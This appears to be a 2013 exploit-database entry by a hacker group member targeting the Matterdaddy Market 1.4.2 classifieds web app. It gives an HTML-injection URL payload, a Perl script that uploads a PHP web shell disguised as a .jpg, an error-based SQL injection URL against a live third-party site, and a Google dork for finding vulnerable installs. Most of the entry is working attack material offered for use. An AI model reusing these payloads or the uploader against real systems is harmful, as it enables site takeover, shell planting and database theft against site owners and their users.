Matterdaddy Market 1.4.2 Cross Site Request Forgery / Arbitrary File Upload



EKU-ID: 3242 CVE: OSVDB-ID:
Author: KedAns-Dz Published: 2013-05-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0     _                   __           __       __                     1
# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
# 1                  \ \____/ >> Exploit database separated by exploit   0
# 0                   \/___/          type (local, remote, DoS, etc.)    1
# 1                                                                      1
# 0  [+] Site            : 1337day.com                                   0
# 1  [+] Support e-mail  : submit[at]1337day.com                         1
# 0                                                                      0
# 1               #########################################              1
# 0               I'm KedAns-Dz member from Inj3ct0r Team                1
# 1               #########################################              0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  
###
# Title : Matterdaddy Market 1.4.2 <= (XSRF/FileUpload) Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria
# Web Site : www.1337day.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# TwiTter : @kedans
# Friendly Sites : www.owasp-dz.org | owasp-dz.org/forum
# Type : php - proof of concept - webapp 0day - remote
# Tested on : Windows7 (Fr)
# Vendor : [http://market.matterdaddy.com]
###
 
# <3 <3 Greetings t0 Palestine <3 <3
# F-ck HaCking, Lov3 Explo8ting !
 
######## [ Proof / Exploit ] ################|=>

####[ (1) XSRF/HTML Injection ]=>

# http://127.0.0.1/market/index.php?q="><h1>Pene-Tested By : KedAns-Dz</h1>

# Demo : http://demo.opensourcecms.com/fbcmarket/index.php?q="><h1>Pene-Tested By : KedAns-Dz</h1>

####[ (2) File Upload .jpg ]=>

# go to : http://[target]/[path]/newItem.php?a=1
# add item info (title,name,price..etc) &..
# add u'r file (.jpg) and submited !
# Check your email and confirm u'r post ;) :p

# or use this perl script ============>

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
|====================================================|
|=   Matterdaddy Market 1.4.2 File Uploader Fuzzer   |
|=         >> Provided By KedAns-Dz <<               |
|=          e-mail : ked-h[at]hotmail.com            |
|====================================================|
INTRO
print "\n";
print "[!] Enter URL(f.e: http://target.com): ";
    chomp(my $url=<STDIN>);
print "\n";
print "[!] Enter File Path (f.e: C:\\Shell.php;.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php;.gif)
    chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/controller.php?op=newItem',
        Content_Type => 'multipart/form-data',
        Content      =>
            [
        'md_title' => '1337day',
        'md_description' => 'Inj3ct0r Exploit Database',
        'md_price' => '0',
        'md_email2' => 'kedans@pene-test.dz', # put u'r email here !
        'city' => 'Hassi Messaoud',
        'namer' => 'KedAns-Dz',
        'category' => '4',
        'filetoupload' => $file,
		'filename' => 'k3dsh3ll.php;.jpg',
 # to make this exploit as sqli change file name to :
 # k3dsh3ll' [+ SQLi +].php.jpg
 # use temperdata better ;)
        ] );
print "\n";
if($re->is_success) {
    if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
    else { print "[!] Check your email and confirm u'r post! \n"; }
} else { print "[-] HTTP request Failed!\n"; }
exit;

####[ (3) SQL Injection ] ===>
# is Old 0day found by r4x0r4x (http://1337day.com/exploit/19635)
# p.o.c : /[path]/action.php?cp=1' [+ SQLi +]
# demo :
# http://www.avnv.us/classifieds/action.php?cp=1%27%20and%28select+1+from%28select+count%28*%29,concat%28%28select%20concat%28%27%3E%3E%27,version%28%29,%27%3C%3C%27%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%20--%20-

# google d0rk : intext:"Powered by Matterdaddy" 

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#============================================================================================================